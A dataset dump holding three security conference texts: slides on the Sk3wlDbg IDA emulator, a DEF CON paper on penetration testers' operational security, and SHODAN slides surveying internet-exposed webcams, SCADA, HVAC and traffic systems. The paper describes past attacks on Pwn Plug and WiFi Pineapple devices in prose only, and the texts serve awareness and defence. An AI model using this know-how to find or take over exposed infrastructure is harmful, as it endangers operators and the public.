text
stringlengths 100
9.93M
| category
stringclasses 11
values |
---|---|
Sk3wlDbg:
Emulating all (well many)
of the things with Ida
Chris Eagle
Sk3wl 0f r00t
Disclaimer
– Everything I say today is my own
opinion and not necessarily the
opinion of my employer and certainly
not the opinion of DARPA
Who am I?
– Senior lecturer of computer science
– Computer security researcher
– Reverse engineer
– Inveterate Capture the Flag player
– Performer of stupid IDA tricks
Introduction
– CPU emulators are useful in a
variety of cases
• System design before hardware is
available
• Running code from obsolete platforms
• Studying code without need to stand up
full hardware system
– Some emulators go well beyond CPU to
emulate full system including
hardware
Goals
– Make lightweight CPU emulator
available in a static reverse
engineering context
– Temporarily step away from reading a
disassembly to confirm behavior
– Incorporate results of a computation
back into a static analysis
End result - Sk3wlDbg
– Lightweight emulator integrated into
a disassembler
• Disassembler – IDA Pro
• Emulator – Unicorn Engine
IDA Pro
– Commercial disassembler
– Supports many processor families
– Integrated debugger supports x86 and
ARM targets
– Decompiler
• 32/64 bit x86
• 32/64 bit ARM
Unicorn Engine
– Announced at BlackHat USA 2015
– Same people that did Capstone
– http://www.unicorn-engine.org/
– Emulator framework based on QEMU
– Supports x86, x86-64, ARM, ARM64,
Sparc, MIPS, M68k
– Related projects
• http://www.unicorn-engine.org/showcase/
Some other, high profile emulators
– Bochs
• “Bochs is a highly portable open source
IA-32 (x86) PC emulator written in C++”
• http://bochs.sourceforge.net/
– QEMU
• “QEMU is a generic and open source
machine emulator and virtualizer.”
• http://www.qemu.org
Emulators and IDA Pro
– 2003 ida-x86emu
• For deobfuscating x86 binaries
– 2009 Hex-Rays adds Bochs “debugger”
module
– 2014 msp430 for use with
microcorruption
• https://microcorruption.com
– 2016 Unicorn integration
• Because why not
Rationale
– Looked at QEMU and Bochs briefly
when writing ida-x86emu
• Much too heavy weight for what I wanted
• Too lazy to dig into the code to learn
them and strip down
– The Unicorn people did all the heavy
lifting
– Brings more architectures to the
table
Implementation – two choices
– Emulate over the IDA database itself
using the database as the backing
memory
• ida-x86emu does this
• Forces changes on the database – NO UNDO
– Leverage the IDA plugin architecture
to build a debugger module
• IDA’s Bochs debugger module does this
Result
– Many unhappy dev hours, unhappy wife
– Mostly undocumented IDA plugin
interface
VS
– Beta quality emulator framework
– BUT…
It’s Alive!
– Sub-classed IDA debugger_t for all
supported Unicorn CPU types
– Simple ELF and PE loaders map file
into Unicorn
– Fallback loader just
copies IDA sections
into Unicorn
• Integration issues
– IDA remains a 32-bit executable
– Can only interface w/ 32-bit
libraries
– Unicorn doesn’t have great support
for 32-bit builds
– Unicorn’s underlying QEMU code
depends on glib
• Complicates use on Windows
Demo
– Probably not a good idea very alpha
code
– Bugs could be Unicorn’s or
they could be mine
• Demos
– Simple deobfuscation
• ida-x86emu, Bochs, Sk3wlDbg
– Local ARM emulation on Windows
– Local MIPS emulation on Windows
– Scripted control of Sk3wlDbg to
solve CTF challenge
• What the future holds (1)
– Better user interface when launching
emulator
• Where emulation should actually begin?
• Initial register state?
– Implementation of IDA’s appcall hook
• Allows you to call functions in the
binary from your IdaPython scripts as
long as the function has a prototype
• What the future holds (2)
– Extensible hooking for library
functions and system calls
• Ideally you implement you hook in
IdaPython and it gets called
– Option to load shared libraries into
emulation along with executable
loaded in IDA
Where to get it
– https://github.com/cseagle/sk3wldbg
– It’s already there
– Will push latest changes after
Defcon
Questions ???
– Contact info
• Email: cseagle at gmail dot com
• Twitter: @sk3wl | pdf |
I Hunt Penetration Testers:
More Weaknesses in Tools and
Procedures
Wesley McGrew, Ph.D.
[email protected]
Page ! of !
1
21
DRAFT
Final paper and slide release during
DEF CON 23 at mcgrewsecurity.com and
available on defcon.org shortly
afterwards. Trust me, you’ll want the
final copy.
ABSTRACT
When we lack the capability to understand our tools, we operate at the mercy of those
that do. Penetration testers make excellent targets for bad actors, as the average
tester’s awareness and understanding of the potential risks and vulnerabilities in their
tools and processes is low, and the value of the information they gather and gain access
to among their client base is very high. As demonstrated by Wesley’s DEF CON 21 talk
on vulnerabilities in penetration testing devices, and last year’s compromise of WiFi
Pineapple devices, the tools of offensive security professionals often represent a soft
target. In this talk, operational security issues facing penetration testers will be
discussed, including communication and data security (not just “bugs”), which impact
both testers and clients. A classification system for illustrating the risks of various tools
is presented, and vulnerabilities in specific hardware and software use cases are
presented. Recommendations are made for improving penetration testing practices and
training. This talk is intended to be valuable to penetration testers wanting to protect
themselves and their clients, and for those who are interesting in profiling weaknesses
of opposing forces that may use similar tools and techniques.
Page ! of !
2
21
INTRODUCTION
4
MOTIVATION
4
TERMINOLOGY
4
ASSUMPTIONS ABOUT ATTACKER CAPABILITIES
5
VALUE OF TARGETING PENETRATION TESTERS
6
VICTIMOLOGY
6
GOALS
7
OPERATIONAL SECURITY ISSUES
8
STANDALONE EXPLOITS’ PAYLOADS
8
DATA IN TRANSIT
10
EXTENDING NETWORKS
11
DATA AT REST
11
POINT OF CONTACT COMMUNICATIONS
12
CLASSIFYING PENTESTING TOOL SAFETY
12
CLASSIFYING PENETRATION TESTING TOOL SAFETY
12
CASE STUDY: KALI LINUX TOOLS
14
SECURITY OF IMPLANTABLE DEVICES
16
PWNIE EXPRESS PWN PLUG
16
HAK5 WIFI PINEAPPLE MARK V
17
CONCLUSIONS AND RECOMMENDATIONS
19
OPERATIONAL
20
TRAINING AND INSTRUCTIONAL
20
REFERENCES
21
Page ! of !
3
21
INTRODUCTION
Motivation
It is this author’s viewpoint that penetration testers, or “attackers” in general, are
simultaneously:
• Very attractive targets, for the information and access that they naturally carry
and are associated with
• Highly vulnerable, due to the usage of tools and procedures that are not
themselves resistant to attack
It may seem counter-intuitive, but a professional engaged in offense is not necessarily
an expert on their own defense, and may lack the knowledge or experience needed to
identify their own risks and take measures to prevent compromise. By describing the
operational security concerns specific to penetration testers, identifying vulnerabilities
in tools and procedures, and classifying tools by the degree of care that must be taken in
using them, it should be possible to raise awareness among offensive security
professionals. Ultimately, tests may become more secure, raising the security of
penetration testers and their clients, and more secure tools and techniques may arise.
Training and instructional material for penetration testers may adapt as well.
The same information may also be useful to those engaged in “active defense”/counter-
attacks against threats. Many of the same concerns for security that penetration testers
face are also faced by malicious attackers. For those who hunt the hunters, you may be
able to apply this information to mapping out potential weaknesses…
Terminology
In this paper and the associated talk, the potential exists to confuse the two types of
attackers:
Page ! of !
4
21
• Those who are conducting attacks on a target organization (penetration testers, for
most of our examples)
• Those who are attacking the first category
I will not be distinguishing who is the “good guy” or “bad guy” in this work. The first
category might be attackers that want to cause harm to the target organization, and the
second might be a group working to stop them. It’s a matter of situation and perspective.
To make things easier to follow, the term penetration tester, or pen tester, will be
used to describe those who are conducting attacks on target organizations. This is a
simplification, as those terms imply the attacks are authorized, when that is not
necessarily the case for all useful interpretations of this work. The term attacker will
only be used in the context of those who are attacking the penetration testers.
Assumptions About Attacker Capabilities
In this work, we have to make some assumptions about how an attacker might be able
to compromise a penetration tester. While any potential attacks will be discussed in the
context of the pre-requisites needed for that attack to be successful, it’s important that
we establish what can be considered realistic. This section describes the assumptions
that were used in determining the vulnerabilities that penetration testers face.
This work largely assumes that an attacker operates with sophistication, skill, and
resources that exceeds that of the targeted penetration tester, even though that
penetration tester has experience with offensive tools. While it is hoped that this work
will help penetration testers repair the imbalance, it is fair to assume at the current
time, given the value of the compromised information, that an attacker motivated to
compromise a penetration tester is potentially well-funded.
Page ! of !
5
21
VALUE OF TARGETING PENETRATION TESTERS
Victimology
When an attacker launches an attack against a penetration tester, the ultimate target
may vary (see Figure 1). It is possible that the pen tester is the primary victim, in that
the attack has been carried out to damage the pen tester in some direct way. Imagine
scenarios where the pen tester has personal, business, or consultancy information that
is of interest to an attacker that might want to commit some form of fraud. A goal might
be to sabotage the operations of a pen tester, or leak their private communications, in a
way that embarrasses them among their peers or potential clients. Consider the
!
Figure 1 - Victims of attackers compromising penetration testers include testers and their clients.
Page ! of !
6
21
Client
Attacker
Penetration
Tester
Attacker
Attacker
Client
Client
Client
Client
Penetration
Tester
Penetration
Tester
targeting of security professionals by Zero for 0wned [1] or mass remote disabling of
Hak5 WiFi Pineapple devices on-site at DEF CON 22 [2].
More valuable and more sinister, however, is the concept of the penetration tester’s
client base as a target for the attacker. The victim might be a single client, or a
persistent compromise of a pen tester might be leveraged into compromising all of the
clients that the pen tester engages with over a period of time. If client data is not stored
securely by the tester, an attacker might be able to compromise clients for whom the
test occurred prior to the compromise of the pen tester.
Goals
Typically, penetration testers of an organization exist outside the normal employee/
account structure, and their access to the organization’s network is extensive and, by
the nature of a pen test, not constrained to policy. Indeed, it’s a pen tester’s job to
explore the possibilities of elevating access where technical and policy measures are not
currently adequate. One measure of a “good” penetration test is its fidelity in simulating
an realistic attack on a target organization. A compromised penetration tester might
accomplish, for a specific or large number of targets, the goals of an attacker that is
“riding along”.
The attacker may also be seeking to steal tools and techniques from the penetration
tester. While most penetration testers are most likely not in possession of zero-day
vulnerability information for popular software products, some percentage might
subscribe to private exploit feeds or commercial tools from which an attacker might
derive value. An attacker who has thoroughly compromised a pen tester’s operations
might even be able to intentionally modify the results of the pen tester’s scans and
exploits to “hide” a bug from the pen tester. This would allow an attacker to gain access
where the pen tester failed, or to maintain exclusive access to a system they are already
on. In this way, an attacker can prevent vulnerabilities from being reported, avoid
examination on some systems, and maintain persistence in the organization even after
remediation steps are taken post-report.
Page ! of !
7
21
A penetration tester can make an excellent smoke screen as well. Many penetration
testing tools are “noisy”, and depending on how a test is scoped, the organization’s IT
security staff are likely to either know a test is taking place or will be expected to find
out. An attacker’s activities attacking and setting up persistence are more likely to go
unchallenged amongst the traffic generated by the penetration testers, especially if
those activities appear to be coming from the same source.
OPERATIONAL SECURITY ISSUES
The techniques and procedures penetration testers use might expose them to attackers
as much or more than specific vulnerabilities in the tools that they use.
Standalone Exploits’ Payloads
The most popular free collection of exploits used by penetration testers is included with
the Metasploit exploit development framework. Metasploit abstracts the payload away
from the exploit code for the purposes of modularity, also giving us a set of payloads we
can “trust” and plug into a wide variety of exploits. Unfortunately, not all publicly
available exploits are in Metasploit, and there is a large body of “standalone” exploits
available in various scripting languages. Sites like Offensive Security’s Exploit
Database[4] collect these exploits, though a penetration tester might find one on a
mailing list or less well-established site in the course of researching a particular target’s
vulnerabilities.
These exploits typically come with a binary payload encoded directly into a string in the
exploit itself. These payloads are rarely annotated with regards to the opcodes they
represent, and occasionally don’t even label the primary goal of the payload as a whole
(“maybe this launches /bin/sh?”). Many exploits, including some written to ultimately
use external payloads (such as exploits distributed for use with Metasploit), contain long
encoded binary strings provided as input to the remote service as part of the
exploitation process.
Page ! of !
8
21
Each encoded string and payload represents a part of the exploit’s code that
the penetration tester must either fully understand or place trust in by
association with its source. Non-payload strings could be examined, with knowledge
of their impact on the target software. As for the payload, one choice is to disassemble
the provided payload in order to verify its expected operation. Another choice would be
to replace the payload with a trusted one (perhaps one from the Metasploit Framework),
making any adjustments necessary for size and filtering. If a penetration tester
explicitly trusts the source from which the exploit was obtained, he or she might forgo
these checks.
In reality, this trust decision is often forced by the lack of training and skill in
programming, vulnerability analysis, and exploit development among
penetration penetration testers. Many testers do not have the necessary experience
with disassemblers and reading low-level assembly language that is necessary to
understand un-annotated listings of payloads. The details of what makes software
vulnerable and how an exploit works to set up the desired state of the target software is
considered to be an advanced topic for penetration testers. Some penetration testers
lack the versatility needed to move between the many programming languages needed
to understand targeted software, exploits, and their payloads.
This is a result of how penetration testers are taught. As a “sexy” profession, with
dreams of being a paid “hacker” without fear of prosecution, many are drawn to books
and training programs that require little in the way of prerequisite knowledge. It’s
relatively simple to prop someone up with “just enough” skill to go through the motions
of a test, using tools that embody knowledge far beyond that required to launch them. A
penetration tester can be safe without this advanced knowledge if they stay well within
the boundaries of using code vetted by others, however in cases where an external
source has an exploit that may make the difference between a successful and a failed
test, one can predict what many pen testers will do.
Page ! of !
9
21
Attack scenarios for this are not difficult to imagine. A “watering hole” style attack may
place backdoored exploits on the public Internet for the target penetration tester (or a
wide range of testers) to find and use. A non-functional “exploit” for a version of target
software not known to be vulnerable would likely be successful in drawing interest.
Most penetration testers have experience with exploit code that simply does not work,
and therefore would not necessarily be suspicious after it failed. A working exploit that
also introduces persistence for the attacker on either the penetration tester or the target
organization would be even more successful. Many websites where exploits are
distributed, including the popular Exploit Database[4], operate over plaintext
HTTP, which would allow an attacker in the right position to man-in-the-
middle rewrite or replace exploit code being downloaded by penetration
testers. This is no longer true of Exploit Database, as of a recent change in the site!
Data in Transit
A penetration tester will, in the course of their test, interact over networks with the
target organization’s systems. This will include all phases of the test, but we are
especially concerned here with exploitation and post-exploitation. In post-exploitation,
we consider the command and control of target systems and the exfiltration of target
information. In the exploitation phase of a test, a penetration tester might not have the
choice of encrypting communications with the target service, leaving the details of
exploitation and at least the probable success or failure of the exploit open to
interception.
Upon successful exploitation by a penetration tester, the communications between the
target system and the penetration tester are sensitive. Typically included in this traffic
are commands and responses as the pen tester interactively (or though some
automation) uses the target system, as well as data observed on or wholesale-exfiltrated
from the target system. The establishment of this communication and its contents
represent a desirable target for attackers.
Page !
10 of !
21
Post-exploitation communications are usually either handled within the payload, with
the most straightforward (and insecure) example being a shell served over a plaintext
TCP session, configured by the payload (such as an added OS user), or configured by the
penetration tester interactively through a payload. The most versatile payload in the
Metasploit Framework, Meterpreter, has used encryption for its communications since
2009. Unfortunately, among free exploits and the payloads contained with them, there
are many exploits not in Metasploit, and most of those bring their own payloads which
typically do not encrypt traffic. Even when trained in exploit development, penetration
testers may not be using payloads that securely communicate.
Extending Networks
Many devices that penetration testers implant for the purposes of remote access allow
for command and control via out-of-band communications in order to avoid detection by
the target organization. Are these implanted devices also (temporarily) opening up the
network for attackers? Are the communications channels (rogue WiFi, cellular data,
text) secure?
Data at Rest
Exfiltrated data must be stored by penetration testers for some time while it awaits
analysis and reporting. There are a number of questions that should be asked about the
security of this data:
• Where is the storage located? Is it physically controlled by the penetration tester?
• If data is on an implanted device (such as a Pwn Plug or WiFi Pineapple), is it
physically secure within the target organization? (For this question, if the implant
was placed surreptitiously, the answer is likely “no”.)
• Is the data encrypted? If it is encrypted by disk/volume based encryption, how
much time does it spend unlocked?
• Where are the keys? Who has access?
Page !
11 of !
21
• What client data is kept? Is it more than is needed for continuation of the test and
reporting?
• Is client data securely deleted after it is no longer needed?
Additionally, the above questions need to be asked separately for past client reports
(and any other data that might be stored about a client across engagements, such as
notes taken by the individual pen testers). Even outside the scope of attacks launched
against penetration tester tools and techniques during an engagement, if a penetration
testing company is compromised in a conventional way (phishing, malware, etc.) as any
business may be targeted, the compromise could reveal very sensitive client data.
Point of Contact Communications
A well-defined and scoped test will likely include a point-of-contact within the target
organization for penetration testers to communicate with. These communications may
include starting and ending times for tests, notification of inadvertent crashes, and
clarifications on scope. Ultimately, a report must be delivered. Are these
communications subject to eavesdropping, interception, or denial of service?
CLASSIFYING PENTESTING TOOL SAFETY
Classifying Penetration Testing Tool Safety
Later this work, we will look at a subset of the tools within Kali Linux as a case study in
classifying tools in the system described in Figure 2. The category names on their own
require some explanation, which will follow.
Page !
12 of !
21
!
• Tools classified as Dangerous may cause a penetration tester to be particularly
vulnerable to attackers. Known vulnerabilities in the tool would contribute to this,
as well as communications that are clearly subject to eavesdropping or man-in-the-
middle attacks.
• Use With Care tools have defaults or common use cases that may lead to
situations that would classify them as Dangerous, but can be configured or used in
a way that mitigates the risk by someone mindful of the issues laid out in this
work.
• Naturally Safe tools default to secure communications and are generally safe to
use in normal use cases.
• Assistive tools are those that are not penetration testing attack or communication
tools, but can be utilized to help with the operational concerns described earlier,
particularly communication and data-at-rest issues.
Note that these are simply at-a-glance classifications meant to draw penetration tester
attention to where it may be needed. The details are often more complex. A tool
considered Dangerous may be perfectly secure if measure are taken to mitigate its
Page !
13 of !
21
Dangerous
Use With Care
Naturally Safe
Assistive
Figure 2 - Classification of Penetration Tool Impact on Security
vulnerabilities and/or attack surfaces (such as being wrapped/tunneled in a secure
channel), or if it is used in situations that avoid attackers (such as operating closer
network-wise to the target). A Naturally Safe tool may in fact be quite dangerous if
used outside of its normal use cases or configuration by a penetration tester with
improper awareness.
It is also worth noting that so few penetration testing tools have built-in
capabilities for encrypting the saved results of their operation, even in cases
where that output is designed to be stored for later analysis, that this is not
considered in this work’s classifications. In all cases, it is recommended that
penetration testers implement their own measures for securely storing the results of
penetration testing tools executed against client machines.
Case Study: Kali Linux Tools
Offensive Security’s Kali Linux is clearly the most popular distribution of Linux for
desktop and laptop computers among penetration testers. While the individual tools
that comprise Kali are not exclusive to it, the effort and time required to install and
correctly configure them all is significant, compared to the ease of deployment and use of
the Live CD, installation, or virtual machines. Offensive Security’s own training
programs make use of Kali Linux, and many other training programs and books do as
well.
The following table contains a subset of the Kali tools, color coded with the classification
system described in the previous section:
Page !
14 of !
21
Tool
Classification
Rationale
BeEF
Dangerous
Default pen tester interface is HTTP listening for connections from
anywhere, with a default username and password. Recommend at
least configuring/firewalling it to only listen on the localhost (or
specific remote ones), changing passwords in the config file.
Hooked clients communicate with the server via unencrypted
HTTP, which may be unavoidable. This is incredibly useful
software, though, just be very careful with where it’s deployed and
where the hooked clients are.
sqlninja
Use With Care
Interacts with the target database over a vulnerable web
application, so communications-wise you’re at the mercy of the
target application being accessible over HTTPS. Be mindful of
where you launch this from when targeting HTTP-only apps.
dirbuster
Use With Care
This classification could be valid for nearly any scanning software.
If pointed at unencrypted services (in this case, HTTP), then your
findings are essentially shared with anyone listening in.
searchploit
Assistive
By providing a mechanism for searching a local copy of the
Offensive Security Exploit Database acquired as a secure package
that would otherwise be accessed through the non-HTTPS
exploit-db.com, this tool provides a set of standalone exploits that
have gone through at least some vetting.
Metasploit
exploitation with
Meterpreter
payload
Use With Care
Metasploit has a lot of functionality, but specifically for launching an
exploit and deploying a meterpreter payload, the communication
channel is fairly safe. An attacker may be able to observe and
conduct the same attack, though.
SET with
Meterpreter
payload
Use With Care
Similar rationale as Metasploit. The resulting channel is safe,
unless you are hijacked on the way there.
cymotha
Dangerous
None of the provided injectable backdoors offer encryption. Could
potentially modify this to include some more robust backdoors, or
use the “script execution” backdoor to configure an encrypted
channel.
nc
Dangerous
Good old vanilla netcat, like your favorite book/trainer taught you,
gives you nothing for communications security.
Page !
15 of !
21
Overall, Kali Linux itself has to be considered as Use With Care, both as a combination
of tools of varying classifications, and with the operating system itself being configured
primarily to support its set of tools, rather than a secure computing environment. For
example, most Kali users operate as the root user for the majority of the time.
SECURITY OF IMPLANTABLE DEVICES
Pwnie Express Pwn Plug
The author of this work previously presented, at DEF CON 21, some initial work
studying vulnerabilities in penetration testing devices. This work focused on
vulnerabilities in the web interface of the commercial firmware for the original Pwn
Plug device[6]. This device is meant to be an implantable device, easily mistaken as a
power supply for a device such as a printer, and provide a penetration tester with
remote access to an internal network. This was the first of the Pwnie Express “sensor”
devices, and is currently sold as an “Academic Edition” device [5].
ncat
Naturally Safe
Netcat, but with SSL support that one can use. You’ll need to set
up certificates for it.
dbd/sbd
Use With Care
Another netcat clone with encryption. Easier to set up than ncat
for encryption, but relies on a shared passphrase that you’ll have
to be careful about setting on either end.
gpg
Assistive
Provides the capability to encrypt data at rest and prepare
sensitive data for transit
truecrypt
Assistive
Provides the capability to encrypt data at rest and prepare
sensitive data for transit
Tool
Classification
Rationale
Page !
16 of !
21
The work performed by this author included a procedure for acquiring a forensic image
of the device for the purposes of extracting information about its operator. At the time,
version 1.1.2 of the commercial firmware was vulnerable to command injection via a
combination of XSS and CSRF in the “plugui” web interface. To exploit the
vulnerability, crafted packets were sent to the device’s sniffer in order to make the user
interface display crafted web requests that included the XSS/CSRF/command-injection
payload. A script was then uploaded to the device for persistent access and continuous
exfiltration of new information logged by the device.
Pwnie Express has since expanded their offerings into a series of new “plugs”, as well as
phones and tablets configured for penetration tester use.
Hak5 WiFi Pineapple Mark V
The vulnerabilities that a WiFi Pineapple introduces into a penetration test for the
client and the tester are difficult to avoid. This has been a popular device for years, and
it’s just recently becoming safe to use under certain circumstances. The Pineapple is
sold as an all-purpose penetration testing appliance, able to perform a variety of
wireless attacks and interceptions, as well as act as an implantable remote access
solution, through which a penetration tester can launch further attacks on a target
organization. Testing wireless security involves a lot of risk if it is assumed that there
are other bad actors in the area eavesdropping.
Versions of the WiFi Pineapple firmware released before DEF CON 22 in 2014 (versions
prior to 2.0.0) were vulnerable to a bypass of the authentication on the web-based
interface. Authentication was being performed in the footer of the PHP code, simply not
displaying the rendered page if authentication of the user did not check out. This made
it possible to blindly inject commands into a variety of interfaces within the web-based
administration panel. This vulnerability was demonstrated by the author at DEF CON
23[2]. This vulnerability was clearly and directly exploitable in an automated fashion,
giving an attacker assured access to a penetration tester’s device, within range.
Page !
17 of !
21
In the months that have passed since DEF CON 22, an effort by the Hak5 developers
has been put into making the Mark V a more secure device for its operator. The latest
version of the firmware, 2.2.0, includes a separate wireless interface specifically
designed for the administration of the device (on older versions, wireless administration
was accomplished on the same unencrypted interface as the one that was opened for
victims to connect). Authentication is now checked in the header.php prior to any other
action, and anti-CSRF code has been inserted into the header as well. For all actions,
other than those that are authentication-related, a CSRF token must be set that
matches the SHA1 hash of the PHP session ID.
The only code of use not protected from cross-site request forgery is the authentication
code. An attacker able to draw an operator’s web browser into submitting a GET request
to the Pineapple interface would be able to log the operator out of the interface. This
requires a currently-interactive operator and the ability of an attacker to draw the
operator’s interest to a non-Pineapple-interface site. While this scenario isn’t out of the
question, the payoff for an attacker is very limited.
While much of the process of checking for and obtaining upgrades from within the
Pineapple interface is performed over HTTPS to wifipineapple.com, the download of the
actual update file is performed over plain HTTP in /pineapple/components/system/info/
includes/files/downloader. The corresponding installer script does not check any kind of
signature, simply installing whatever image is located at /tmp/upgrade.
For an upgrade instantiated over the web interface, the size and MD5 hash of the
upgrade is acquired over an SSL connection, and resubmitted by the operator’s browser
back to the web interface to be checked before the installation begins. This makes this
upgrade process only as secure as the XSS/CSRF protection of the interface, rather than
on the strength of a hash. The manual upgrade process is more secure. The firmware
download page is HTTPS by default, and the manual upgrade instructions specifies that
the MD5 hash should be verified by the operator.
Page !
18 of !
21
By the classification system defined in this paper, the current version (2.2.0) of the WiFi
Pineapple Mark V firmware is considered classified as Use With Caution as an attack
platform, primarily due to the exposure to tampering it faces in its natural unattended
use cases. It is important to note that this classification is with the caveat that if
Pineapple features are used to set up open rogue access points, then it naturally exposes
the users of those access points to eavesdropping by third-party attackers. This is,
however, inherent to the nature of the device and what it tests, so it may be ultimately
unavoidable. This should be discussed with the client when scoping the test, and care
should be taken to limit how and for what duration this feature is used.
Comparatively, the 2.0.0 version and prior (those that were vulnerable to
@ihuntpineapples-style attacks), along with any firmware version of previous hardware
WiFi Pineapples (Mark IVs and older), should be classified as Dangerous for use in
penetration testing. Any “clone” devices home-configured or sold with older WiFi
Pineapple software (such as the “WiFi R00tabaga” in Pineapple mode, or other
miniature routers described on the net) should also be classified as Dangerous.
While penetration testing devices are attractive to inexperienced penetration
testers, safe operation of any current implantable penetration testing device is
going to depend very heavily on preparation and the skill of the penetration
tester that deploys the device. If such devices are used on a real penetration test,
planning should include a discussion of how each issue raised in the operational security
issues above will be addressed.
CONCLUSIONS AND RECOMMENDATIONS
Penetration testers are valuable targets and frequently and uniquely vulnerable as a
result of their tools, techniques, and training. This vulnerability has serious
consequences for the penetration tester being targeted by an attacker, as well as the
body of clients that that penetration tester serves. It is hoped that an awareness of the
Page !
19 of !
21
issues raised in this work, and a system for classifying tools, will help improve the
security of penetration testers.
The following specific recommendations may also help:
Operational
• Test tools and exploits before deployment into a real test, as much as possible.
Never launch a tool or exploit that you don’t fully understand and/or trust.
• Be aware of what information is exposed in exploitation and post-exploitation
connections you make to the client. Know which ones of your tools, exploits, and
payloads encrypt for you.
• Be aware of the network environment between you and the client, and if the
information exposure cannot be suitably mitigated, attempt to reduce the network
distance between your tools and the client. For example, launch an insecure tool
from a beachhead within the client network, then encrypt and transfer the results.
• Take care when “extending” a client network with an access point or covert
channel. Are you opening that network up for another attacker?
• Keep client data in an encrypted state unless you are analyzing it or writing the
report. Having it on your whole-disk encrypted computer that never turns off is
not good enough.
• Securely delete any client data not needed between engagements. Encrypt the
rest, including reports.
• Communicate results to the client in person, or over a secure medium.
Training and Instructional
• Discuss the role of secure communications and handling of client data.
Page !
20 of !
21
• Where possible, teach a penetration testing exploitation and post-exploitation
process that focuses on establishing a secure channel before exfiltration.
• Do not treat penetration testing as something that can be undertaken without an
understanding of programming, vulnerability analysis, exploit development, and
basic operational security. When we lack the capability to understand our
tools, we operate at the mercy of those who do.
REFERENCES
[1] zf0 ezine, http://web.textfiles.com/ezines/ZF0/
[2] Ms. Smith, Hacker Hunts and pwns WiFi Pineapple with zero-day at Def Con, http://
www.networkworld.com/article/2462478/microsoft-subnet/hacker-hunts-and-pwns-wifi-
pineapples-with-0-day-at-def-con.html
[3] Carlos Perez, Meterpreter Stealthier than Ever, http://www.darkoperator.com/blog/
2009/7/14/meterpreter-stealthier-than-ever.html
[4] Offensive Security, Exploit Database, http://exploit-db.com
[5] Pwnie Express, Pwn Plug Academic Edition, https://www.pwnieexpress.com/product/
pwn-plug-academic-edition/
[6] Wesley McGrew, Pwn The Pwn Plug - Analyzing and Counter-Attacking Attacker-
Implanted Devices, https://www.defcon.org/images/defcon-21/dc-21-presentations/
McGrew/DEFCON-21-McGrew-Pwn-The-Pwn-Plug-WP.pdf
Page !
21 of !
21 | pdf |
Drinking From the
Caffeine Firehose
We call SHODAN.
By Viss!
Prepared for Defcon 20
Thursday, July 12, 12
This is not just another
shodan talk.
Today we turn shodan into a gateway
drug.
Thursday, July 12, 12
What do people put on
the internet?
Routers, switches, servers, printers..
Meh. seen it.
Show me something new!
Thursday, July 12, 12
What’s on the internet that
nobody is accounting for?
... is anybody actually checking?
Seriously, has anybody ever done this?
Thursday, July 12, 12
Apparently not!
Thursday, July 12, 12
A little editorial on
policy....
If you can’t scan yourself freely, how do
you determine your level of exposure?
What’s the attack surface?
Thursday, July 12, 12
Before we begin..
Everything found here is
PUBLIC
No credentials required
no “secure” systems.
This is all “free play”.
Thursday, July 12, 12
Also, No systems
were altered.
This was a
READ ONLY
Exercise.
Thursday, July 12, 12
Webcams!
Thursday, July 12, 12
Who watches the watchers?
Thursday, July 12, 12
Who watches the watchers?
Meeeeeeee >:D
Thursday, July 12, 12
Scada gear on webcams!
Thursday, July 12, 12
Other stuff on webcams!
Thursday, July 12, 12
But most cameras are boring
Thursday, July 12, 12
This thing!
... (no idea)
Thursday, July 12, 12
A um.. “T-2000” ! ..
... whats a T-2000?.. relion?
Thursday, July 12, 12
Its a hydrogen fuel cell.
Thursday, July 12, 12
Looks industrial!
Thursday, July 12, 12
Gets used a lot in .mil...
Thursday, July 12, 12
This is how you use it
Thursday, July 12, 12
So where do you
find these things?
Thursday, July 12, 12
Oh..
Thursday, July 12, 12
Security is a joke.
Thursday, July 12, 12
Wind farms!
Thursday, July 12, 12
Lighting, HVAC, Alarms
Thursday, July 12, 12
More hvac/lighting
Thursday, July 12, 12
Power meters?
Thursday, July 12, 12
Heat pumps
Thursday, July 12, 12
Bigger heat pumps
Thursday, July 12, 12
Private residences?!
Thursday, July 12, 12
... trending data?
Thursday, July 12, 12
Water heaters
Thursday, July 12, 12
Familiar displays!
Thursday, July 12, 12
Some more power systems
Thursday, July 12, 12
Larger industrial systems
Thursday, July 12, 12
Contents under presure
Thursday, July 12, 12
So I found a BUNCH of
stuff.
But what if anything is
actually actionable?
Thursday, July 12, 12
Well, OSINT is
fashionable...
Lets flex that muscle :D
Thursday, July 12, 12
Level One:
Simple recon
Thursday, July 12, 12
Quick observations..
Thursday, July 12, 12
What details can we see?
Thursday, July 12, 12
Leaking data in meatspace
Thursday, July 12, 12
Company name leads to address
Thursday, July 12, 12
Level Two:
Interactions
Thursday, July 12, 12
DISCLAIMER:
I didn’t have any idea this
happened until someone showed
me a gallery of screencaps...
Thursday, July 12, 12
Thursday, July 12, 12
Thursday, July 12, 12
Level Three:
Remember the movie
Live Free or Die Hard?
Thursday, July 12, 12
Yeah, Its kinda like that.
Thursday, July 12, 12
Timothy Olyphant did it with a
Semi filled with millions of dollars
of expensive equipment
and a black ops team?
Thursday, July 12, 12
Though this depiction
Was an insanely successful
Social Engineering campaign, overall.
Thursday, July 12, 12
Except, I’m not shooting
down helicopters with cars.
Thursday, July 12, 12
Massive coolers
Thursday, July 12, 12
Massive coolers with details!
Thursday, July 12, 12
Some scada keeps logs!
Thursday, July 12, 12
Massive power/UPS gear.
Thursday, July 12, 12
VNC Touchpanels
Thursday, July 12, 12
Okay okay.. Its a little
Freaky, but it’s no “firesale”...
Thursday, July 12, 12
Meet i.lon.
Thursday, July 12, 12
Its stackable! Like devo hats!
Thursday, July 12, 12
....
Thursday, July 12, 12
....
Thursday, July 12, 12
Thursday, July 12, 12
Thursday, July 12, 12
So I can control the:
power, lights, hvac
ice skating rink, garage doors
water pressure and boilers
Of something like 36 businesses
all in one town?
Thursday, July 12, 12
Getting a little closer, eh?
Thursday, July 12, 12
Econolite. Stoplights.
Thursday, July 12, 12
AUTOPLATE.
These are red light cameras.
The ones that ticket you.
Thursday, July 12, 12
DakTronics.
Thursday, July 12, 12
DakTronics.
Thursday, July 12, 12
Red light cameras, road
signs and stoplights.
Check.
Thursday, July 12, 12
How about some current
events?
Ruggedcom?
Other stuff thats fun?
Thursday, July 12, 12
Thursday, July 12, 12
Thursday, July 12, 12
Does this look like
malware?
Thursday, July 12, 12
Now it looks ..
“better”?.. I guess? :\
Thursday, July 12, 12
I put that on twitter.
A day later DHS called my
cellphone.
Thursday, July 12, 12
Satellite systems
Thursday, July 12, 12
NAS storage arrays
Thursday, July 12, 12
“LaserWash”
Car Wash Systems
Thursday, July 12, 12
Massive Humidifiers
Thursday, July 12, 12
Massive Humidifiers
